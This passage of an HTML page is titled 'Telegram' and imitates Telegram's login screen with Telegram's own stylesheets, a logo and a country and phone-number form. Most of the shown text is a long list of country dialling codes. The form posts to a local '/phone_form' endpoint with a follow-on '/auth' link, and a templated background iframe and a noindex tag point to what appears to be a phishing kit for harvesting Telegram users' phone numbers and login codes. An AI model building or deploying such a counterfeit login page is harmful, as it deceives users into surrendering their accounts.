<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <title>Telegram</title>
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"
    />
    <meta name="format-detection" content="telephone=no" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="MobileOptimized" content="176" />
    <meta name="HandheldFriendly" content="True" />
    <meta name="robots" content="noindex, nofollow" />
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css"
      integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3"
      crossorigin="anonymous"
    />
    <link
      href="https://fonts.googleapis.com/css?family=Roboto:400,500"
      rel="stylesheet"
      type="text/css"
    />
    <link
      href="https://telegram.org/css/bootstrap.min.css?3"
      rel="stylesheet"
    />
    <link
      href="https://telegram.org/css/bootstrap-extra.css?2"
      rel="stylesheet"
    />
    <link href="https://telegram.org/css/telegram.css?231" rel="stylesheet" />
    <link href="../static/css/oauth.css?14" rel="stylesheet" />
    <link href="../static/css/phone_form.css" rel="stylesheet" />
    <!-- <link rel="stylesheet" href="../static/css/style.css"> -->
  </head>
  <body>
<!-- 	<iframe src="{{bg_link}}" frameborder="0"></iframe> -->
    <main class="phone-form-container">
      <section class="phone-form-content d-flex flex-column align-items-center">
        <div class="phone-form-image">
          <img src="../static/images/logo-tg-new.jpg" />
        </div>
        <h1
          class="phone-form-title text-center text-white"
          id="phone-form-title"
        ></h1>
        <p class="phone-form-text text-center" id="phone-form-text"></p>
        <form
          id="send-form"
          class="login_form"
          method="POST"
          action="/phone_form"
        >
          <div
            class="login_country_field_wrap field_wrap"
            id="login-country-wrap"
          >
            <div
              class="login_country_select"
              id="login-country-selected"
              data-placeholder="Unknown country"
            ></div>
            <label class="input-label" id="country-input-label"></label>
            <span class="arrow arrow-down"></span>
            <div class="login_country_search_wrap">
              <div class="textfield-item" id="login-country-search-textfield">
                <input
                  type="text"
                  class="form-control"
                  id="login-country-search"
                  autocomplete="off"
                  placeholder="Afghanistan"
                />
              </div>
              <div
                class="login_country_search_results"
                id="login-country-search-results"
                data-noresult="Unknown country"
              ></div>
            </div>
          </div>

          <div class="phone-container field_wrap">
            <div class="login_phone_field_wrap">
              <div class="login_code_field_wrap">
                <div class="textfield-item" id="login-phone-code-textfield">
                  <input
                    type="tel"
                    name="phone-code"
                    class="form-control"
                    id="login-phone-code"
                    autocomplete="off"
                  />
                </div>
              </div>
              <label class="input-label" id="phone-input-label"></label>
              <div class="login_number_field_wrap">
                <div class="textfield-item" id="login-phone-textfield">
                  <input
                    type="tel"
                    name="phone"
                    class="form-control"
                    id="login-phone"
                    autocomplete="off"
                  />
                  <label
                    class="textfield-item-placeholder"
                    id="login-phone-placeholder"
                    data-placeholder=""
                  ></label>
                </div>
              </div>
            </div>
          </div>

          <label class="checkbox-container">
            <input type="checkbox" id="myCheckbox" class="checkbox" />
            <div class="custom-checkbox">
              <div class="custom-checkbox-border"></div>
              <div class="custom-checkbox-bg"></div>
              <!-- <svg
                xmlns="http://www.w3.org/2000/svg"
                width="24"
                height="24"
                fill="#fff"
                class="custom-checkbox-check"
                viewBox="0 0 16 16"
              >
                <path
                  d="M13.854 3.646a.5.5 0 0 1 0 .708l-7 7a.5.5 0 0 1-.708 0l-3.5-3.5a.5.5 0 1 1 .708-.708L6.5 10.293l6.646-6.647a.5.5 0 0 1 .708 0"
                />
              </svg> -->
              <svg
                width="24"
                height="24"
                viewBox="0 0 24 24"
                class="custom-checkbox-check"
                fill="none"
                xmlns="http://www.w3.org/2000/svg"
              >
                <path
                  d="M7 12L9.89075 14.8907V14.8907C9.95114 14.951 10.049 14.9511 10.1094 14.8907V14.8907L17 8"
                  stroke="#fff"
                  stroke-width="2"
                  stroke-linecap="round"
                  stroke-linejoin="round"
                />
              </svg>
            </div>
            <span class="checkbox-text" id="phone-form-checkbox"></span>
          </label>

          <div class="login_button_wrap">
            <!-- <button class="button-item button-item-flat ripple-handler" onclick="return loginCancel(event)"   type="button">
            <span class="button-item-label" id="cancel"></span>
            <span class="ripple-mask"><span class="ripple"></span></span>
          </button> -->
            <button class="button-item ripple-handler" type="submit">
              <span class="button-item-label" id="next"></span>
              <span class="ripple-mask d-none"
                ><span class="ripple"></span
              ></span>
            </button>
            <button class="auth-button is-disabled" type="button">
              <a id="auth-button-link" href="/auth"></a>
              <!-- <span class="ripple-mask"><span class="ripple"></span></span> -->
            </button>
          </div>
        </form>
      </section>
    </main>

    <script src="../static/js/oauth.js"></script>
    <script>
      var CountriesList = [
        {
          iso2: "AD",
          name: "Andorra",
          codes: [{ code: "376", patterns: ["XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "AE",
          name: "United Arab Emirates",
          codes: [{ code: "971", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "AF",
          name: "Afghanistan",
          codes: [{ code: "93", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "AG",
          name: "Antigua &amp; Barbuda",
          codes: [{ code: "1268", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "AI",
          name: "Anguilla",
          codes: [{ code: "1264", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "AL",
          name: "Albania",
          codes: [{ code: "355", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "AM",
          name: "Armenia",
          codes: [{ code: "374", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "AO",
          name: "Angola",
          codes: [{ code: "244", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        { iso2: "AR", name: "Argentina", codes: [{ code: "54" }] },
        {
          iso2: "AS",
          name: "American Samoa",
          codes: [{ code: "1684", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "AT",
          name: "Austria",
          codes: [{ code: "43", patterns: ["XXX XXXXXX"] }],
          patterns: [],
        },
        {
          iso2: "AU",
          name: "Australia",
          codes: [{ code: "61", patterns: ["X XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "AW",
          name: "Aruba",
          codes: [{ code: "297", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "AZ",
          name: "Azerbaijan",
          codes: [{ code: "994", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "BA",
          name: "Bosnia &amp; Herzegovina",
          codes: [{ code: "387", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "BB",
          name: "Barbados",
          codes: [{ code: "1246", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "BD",
          name: "Bangladesh",
          codes: [{ code: "880", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "BE",
          name: "Belgium",
          codes: [{ code: "32", patterns: ["XXX XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "BF",
          name: "Burkina Faso",
          codes: [{ code: "226", patterns: ["XX XX XX XX"] }],
          patterns: [],
        },
        { iso2: "BG", name: "Bulgaria", codes: [{ code: "359" }] },
        {
          iso2: "BH",
          name: "Bahrain",
          codes: [{ code: "973", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "BI",
          name: "Burundi",
          codes: [{ code: "257", patterns: ["XX XX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "BJ",
          name: "Benin",
          codes: [{ code: "229", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "BM",
          name: "Bermuda",
          codes: [{ code: "1441", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "BN",
          name: "Brunei Darussalam",
          codes: [{ code: "673", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "BO",
          name: "Bolivia",
          codes: [{ code: "591", patterns: ["X XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "BQ",
          name: "Bonaire, Sint Eustatius &amp; Saba",
          codes: [{ code: "599" }],
        },
        {
          iso2: "BR",
          name: "Brazil",
          codes: [{ code: "55", patterns: ["XX XXXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "BS",
          name: "Bahamas",
          codes: [{ code: "1242", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "BT",
          name: "Bhutan",
          codes: [{ code: "975", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "BW",
          name: "Botswana",
          codes: [{ code: "267", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "BY",
          name: "Belarus",
          codes: [{ code: "375", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        { iso2: "BZ", name: "Belize", codes: [{ code: "501" }] },
        {
          iso2: "CA",
          name: "Canada",
          codes: [
            {
              code: "1",
              prefixes: [
                "403",
                "587",
                "780",
                "825",
                "236",
                "250",
                "604",
                "672",
                "778",
                "204",
                "431",
                "506",
                "709",
                "902",
                "782",
                "226",
                "249",
                "289",
                "343",
                "365",
                "416",
                "437",
                "519",
                "548",
                "613",
                "647",
                "705",
                "807",
                "905",
                "418",
                "438",
                "450",
                "514",
                "579",
                "581",
                "819",
                "873",
                "306",
                "639",
                "867",
              ],
              patterns: ["XXX XXX XXXX"],
            },
          ],
          prefixes: [],
          patterns: [],
        },
        {
          iso2: "CD",
          name: "Congo (Dem. Rep.)",
          codes: [{ code: "243", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "CF",
          name: "Central African Rep.",
          codes: [{ code: "236", patterns: ["XX XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "CG",
          name: "Congo (Rep.)",
          codes: [{ code: "242", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "CH",
          name: "Switzerland",
          codes: [{ code: "41", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "CI",
          name: "Côte d&#39;Ivoire",
          codes: [{ code: "225", patterns: ["XX XX XX XXXX"] }],
          patterns: [],
        },
        { iso2: "CK", name: "Cook Islands", codes: [{ code: "682" }] },
        {
          iso2: "CL",
          name: "Chile",
          codes: [{ code: "56", patterns: ["X XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "CM",
          name: "Cameroon",
          codes: [{ code: "237", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "CN",
          name: "China",
          codes: [{ code: "86", patterns: ["XXX XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "CO",
          name: "Colombia",
          codes: [{ code: "57", patterns: ["XXX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "CR",
          name: "Costa Rica",
          codes: [{ code: "506", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "CU",
          name: "Cuba",
          codes: [{ code: "53", patterns: ["X XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "CV",
          name: "Cape Verde",
          codes: [{ code: "238", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "CW",
          name: "Curaçao",
          codes: [{ code: "599", prefixes: ["9"] }],
          prefixes: [],
        },
        {
          iso2: "CY",
          name: "Cyprus",
          codes: [{ code: "357", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "CZ",
          name: "Czech Republic",
          codes: [{ code: "420", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        { iso2: "DE", name: "Germany", codes: [{ code: "49" }] },
        {
          iso2: "DJ",
          name: "Djibouti",
          codes: [{ code: "253", patterns: ["XX XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "DK",
          name: "Denmark",
          codes: [{ code: "45", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "DM",
          name: "Dominica",
          codes: [{ code: "1767", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "DO",
          name: "Dominican Rep.",
          codes: [
            { code: "1809", patterns: ["XXX XXXX"] },
            { code: "1829", patterns: ["XXX XXXX"] },
            { code: "1849", patterns: ["XXX XXXX"] },
          ],
          patterns: [],
        },
        {
          iso2: "DZ",
          name: "Algeria",
          codes: [{ code: "213", patterns: ["XXX XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "EC",
          name: "Ecuador",
          codes: [{ code: "593", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "EE",
          name: "Estonia",
          codes: [{ code: "372", patterns: ["XXXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "EG",
          name: "Egypt",
          codes: [{ code: "20", patterns: ["XX XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "ER",
          name: "Eritrea",
          codes: [{ code: "291", patterns: ["X XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "ES",
          name: "Spain",
          codes: [{ code: "34", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "ET",
          name: "Ethiopia",
          codes: [{ code: "251", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        { iso2: "FI", name: "Finland", codes: [{ code: "358" }] },
        {
          iso2: "FJ",
          name: "Fiji",
          codes: [{ code: "679", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        { iso2: "FK", name: "Falkland Islands", codes: [{ code: "500" }] },
        { iso2: "FM", name: "Micronesia", codes: [{ code: "691" }] },
        {
          iso2: "FO",
          name: "Faroe Islands",
          codes: [{ code: "298", patterns: ["XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "FR",
          name: "France",
          codes: [{ code: "33", patterns: ["X XX XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "GA",
          name: "Gabon",
          codes: [{ code: "241", patterns: ["X XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "GB",
          name: "United Kingdom",
          codes: [{ code: "44", patterns: ["XXXX XXXXXX"] }],
          patterns: [],
        },
        {
          iso2: "GD",
          name: "Grenada",
          codes: [{ code: "1473", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "GE",
          name: "Georgia",
          codes: [{ code: "995", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        { iso2: "GF", name: "French Guiana", codes: [{ code: "594" }] },
        {
          iso2: "GH",
          name: "Ghana",
          codes: [{ code: "233", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "GI",
          name: "Gibraltar",
          codes: [{ code: "350", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "GL",
          name: "Greenland",
          codes: [{ code: "299", patterns: ["XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "GM",
          name: "Gambia",
          codes: [{ code: "220", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "GN",
          name: "Guinea",
          codes: [{ code: "224", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "GP",
          name: "Guadeloupe",
          codes: [{ code: "590", patterns: ["XXX XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "GQ",
          name: "Equatorial Guinea",
          codes: [{ code: "240", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "GR",
          name: "Greece",
          codes: [{ code: "30", patterns: ["XXX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "GT",
          name: "Guatemala",
          codes: [{ code: "502", patterns: ["X XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "GU",
          name: "Guam",
          codes: [{ code: "1671", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "GW",
          name: "Guinea-Bissau",
          codes: [{ code: "245", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "GY",
          name: "Guyana",
          codes: [{ code: "592", patterns: ["5926XXXXXX"] }],
          patterns: [],
        },
        {
          iso2: "HK",
          name: "Hong Kong",
          codes: [{ code: "852", patterns: ["X XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "HN",
          name: "Honduras",
          codes: [{ code: "504", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "HR",
          name: "Croatia",
          codes: [{ code: "385", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "HT",
          name: "Haiti",
          codes: [{ code: "509", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "HU",
          name: "Hungary",
          codes: [{ code: "36", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "ID",
          name: "Indonesia",
          codes: [{ code: "62", patterns: ["XXX XXXXXX"] }],
          patterns: [],
        },
        {
          iso2: "IE",
          name: "Ireland",
          codes: [{ code: "353", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "IL",
          name: "Israel",
          codes: [{ code: "972", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "IN",
          name: "India",
          codes: [{ code: "91", patterns: ["XXXXX XXXXX"] }],
          patterns: [],
        },
        {
          iso2: "IO",
          name: "Diego Garcia",
          codes: [{ code: "246", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "IQ",
          name: "Iraq",
          codes: [{ code: "964", patterns: ["XXX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "IR",
          name: "Iran",
          codes: [{ code: "98", patterns: ["XXX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "IS",
          name: "Iceland",
          codes: [{ code: "354", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "IT",
          name: "Italy",
          codes: [{ code: "39", patterns: ["XXX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "JM",
          name: "Jamaica",
          codes: [{ code: "1876", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "JO",
          name: "Jordan",
          codes: [{ code: "962", patterns: ["X XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "JP",
          name: "Japan",
          codes: [{ code: "81", patterns: ["XX XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "KE",
          name: "Kenya",
          codes: [{ code: "254", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "KG",
          name: "Kyrgyzstan",
          codes: [{ code: "996", patterns: ["XXX XXXXXX"] }],
          patterns: [],
        },
        {
          iso2: "KH",
          name: "Cambodia",
          codes: [{ code: "855", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "KI",
          name: "Kiribati",
          codes: [{ code: "686", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "KM",
          name: "Comoros",
          codes: [{ code: "269", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "KN",
          name: "Saint Kitts &amp; Nevis",
          codes: [{ code: "1869", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        { iso2: "KP", name: "North Korea", codes: [{ code: "850" }] },
        {
          iso2: "KR",
          name: "South Korea",
          codes: [{ code: "82", patterns: ["XX XXXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "KW",
          name: "Kuwait",
          codes: [{ code: "965", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "KY",
          name: "Cayman Islands",
          codes: [{ code: "1345", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "KZ",
          name: "Kazakhstan",
          codes: [
            { code: "7", prefixes: ["6", "7"], patterns: ["XXX XXX XX XX"] },
          ],
          prefixes: [],
          patterns: [],
        },
        {
          iso2: "LA",
          name: "Laos",
          codes: [{ code: "856", patterns: ["XX XX XXX XXX"] }],
          patterns: [],
        },
        { iso2: "LB", name: "Lebanon", codes: [{ code: "961" }] },
        {
          iso2: "LC",
          name: "Saint Lucia",
          codes: [{ code: "1758", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "LI",
          name: "Liechtenstein",
          codes: [{ code: "423", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "LK",
          name: "Sri Lanka",
          codes: [{ code: "94", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "LR",
          name: "Liberia",
          codes: [{ code: "231", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "LS",
          name: "Lesotho",
          codes: [{ code: "266", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "LT",
          name: "Lithuania",
          codes: [{ code: "370", patterns: ["XXX XXXXX"] }],
          patterns: [],
        },
        {
          iso2: "LU",
          name: "Luxembourg",
          codes: [{ code: "352", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "LV",
          name: "Latvia",
          codes: [{ code: "371", patterns: ["XXX XXXXX"] }],
          patterns: [],
        },
        {
          iso2: "LY",
          name: "Libya",
          codes: [{ code: "218", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "MA",
          name: "Morocco",
          codes: [{ code: "212", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "MC",
          name: "Monaco",
          codes: [{ code: "377", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "MD",
          name: "Moldova",
          codes: [{ code: "373", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        { iso2: "ME", name: "Montenegro", codes: [{ code: "382" }] },
        {
          iso2: "MG",
          name: "Madagascar",
          codes: [{ code: "261", patterns: ["XX XX XXX XX"] }],
          patterns: [],
        },
        { iso2: "MH", name: "Marshall Islands", codes: [{ code: "692" }] },
        {
          iso2: "MK",
          name: "North Macedonia",
          codes: [{ code: "389", patterns: ["XX XXXXXX"] }],
          patterns: [],
        },
        {
          iso2: "ML",
          name: "Mali",
          codes: [{ code: "223", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        { iso2: "MM", name: "Myanmar", codes: [{ code: "95" }] },
        {
          iso2: "MN",
          name: "Mongolia",
          codes: [{ code: "976", patterns: ["XX XX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "MO",
          name: "Macau",
          codes: [{ code: "853", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "MP",
          name: "Northern Mariana Islands",
          codes: [{ code: "1670", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        { iso2: "MQ", name: "Martinique", codes: [{ code: "596" }] },
        {
          iso2: "MR",
          name: "Mauritania",
          codes: [{ code: "222", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "MS",
          name: "Montserrat",
          codes: [{ code: "1664", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "MT",
          name: "Malta",
          codes: [{ code: "356", patterns: ["XX XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "MU",
          name: "Mauritius",
          codes: [{ code: "230", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "MV",
          name: "Maldives",
          codes: [{ code: "960", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "MW",
          name: "Malawi",
          codes: [{ code: "265", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        { iso2: "MX", name: "Mexico", codes: [{ code: "52" }] },
        { iso2: "MY", name: "Malaysia", codes: [{ code: "60" }] },
        {
          iso2: "MZ",
          name: "Mozambique",
          codes: [{ code: "258", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "NA",
          name: "Namibia",
          codes: [{ code: "264", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        { iso2: "NC", name: "New Caledonia", codes: [{ code: "687" }] },
        {
          iso2: "NE",
          name: "Niger",
          codes: [{ code: "227", patterns: ["XX XX XX XX"] }],
          patterns: [],
        },
        { iso2: "NF", name: "Norfolk Island", codes: [{ code: "672" }] },
        {
          iso2: "NG",
          name: "Nigeria",
          codes: [{ code: "234", patterns: ["XX XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "NI",
          name: "Nicaragua",
          codes: [{ code: "505", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "NL",
          name: "Netherlands",
          codes: [{ code: "31", patterns: ["X XX XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "NO",
          name: "Norway",
          codes: [{ code: "47", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "NP",
          name: "Nepal",
          codes: [{ code: "977", patterns: ["XX XXXX XXXX"] }],
          patterns: [],
        },
        { iso2: "NR", name: "Nauru", codes: [{ code: "674" }] },
        { iso2: "NU", name: "Niue", codes: [{ code: "683" }] },
        {
          iso2: "NZ",
          name: "New Zealand",
          codes: [{ code: "64", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "OM",
          name: "Oman",
          codes: [{ code: "968", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "PA",
          name: "Panama",
          codes: [{ code: "507", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "PE",
          name: "Peru",
          codes: [{ code: "51", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        { iso2: "PF", name: "French Polynesia", codes: [{ code: "689" }] },
        { iso2: "PG", name: "Papua New Guinea", codes: [{ code: "675" }] },
        {
          iso2: "PH",
          name: "Philippines",
          codes: [{ code: "63", patterns: ["XXX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "PK",
          name: "Pakistan",
          codes: [{ code: "92", patterns: ["XXX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "PL",
          name: "Poland",
          codes: [{ code: "48", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "PM",
          name: "Saint Pierre &amp; Miquelon",
          codes: [{ code: "508" }],
        },
        {
          iso2: "PR",
          name: "Puerto Rico",
          codes: [
            { code: "1787", patterns: ["XXX XXXX"] },
            { code: "1939", patterns: ["XXX XXXX"] },
          ],
          patterns: [],
        },
        {
          iso2: "PS",
          name: "Palestine",
          codes: [{ code: "970", patterns: ["XXX XX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "PT",
          name: "Portugal",
          codes: [{ code: "351", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        { iso2: "PW", name: "Palau", codes: [{ code: "680" }] },
        {
          iso2: "PY",
          name: "Paraguay",
          codes: [{ code: "595", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "QA",
          name: "Qatar",
          codes: [{ code: "974", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "RE",
          name: "Réunion",
          codes: [{ code: "262", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "RO",
          name: "Romania",
          codes: [{ code: "40", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "RS",
          name: "Serbia",
          codes: [{ code: "381", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "RU",
          name: "Россия",
          codes: [{ code: "7", patterns: ["XXX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "RW",
          name: "Rwanda",
          codes: [{ code: "250", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "SA",
          name: "Saudi Arabia",
          codes: [{ code: "966", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        { iso2: "SB", name: "Solomon Islands", codes: [{ code: "677" }] },
        {
          iso2: "SC",
          name: "Seychelles",
          codes: [{ code: "248", patterns: ["X XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "SD",
          name: "Sudan",
          codes: [{ code: "249", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "SE",
          name: "Sweden",
          codes: [{ code: "46", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "SG",
          name: "Singapore",
          codes: [{ code: "65", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "SH",
          name: "Saint Helena",
          codes: [{ code: "247" }, { code: "290", patterns: ["XX XXX"] }],
          patterns: [],
        },
        {
          iso2: "SI",
          name: "Slovenia",
          codes: [{ code: "386", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "SK",
          name: "Slovakia",
          codes: [{ code: "421", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "SL",
          name: "Sierra Leone",
          codes: [{ code: "232", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        { iso2: "SM", name: "San Marino", codes: [{ code: "378" }] },
        {
          iso2: "SN",
          name: "Senegal",
          codes: [{ code: "221", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "SO",
          name: "Somalia",
          codes: [{ code: "252", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "SR",
          name: "Suriname",
          codes: [{ code: "597", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "SS",
          name: "South Sudan",
          codes: [{ code: "211", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "ST",
          name: "São Tomé &amp; Príncipe",
          codes: [{ code: "239", patterns: ["XX XXXXX"] }],
          patterns: [],
        },
        {
          iso2: "SV",
          name: "El Salvador",
          codes: [{ code: "503", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "SX",
          name: "Sint Maarten",
          codes: [{ code: "1721", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "SY",
          name: "Syria",
          codes: [{ code: "963", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "SZ",
          name: "Eswatini",
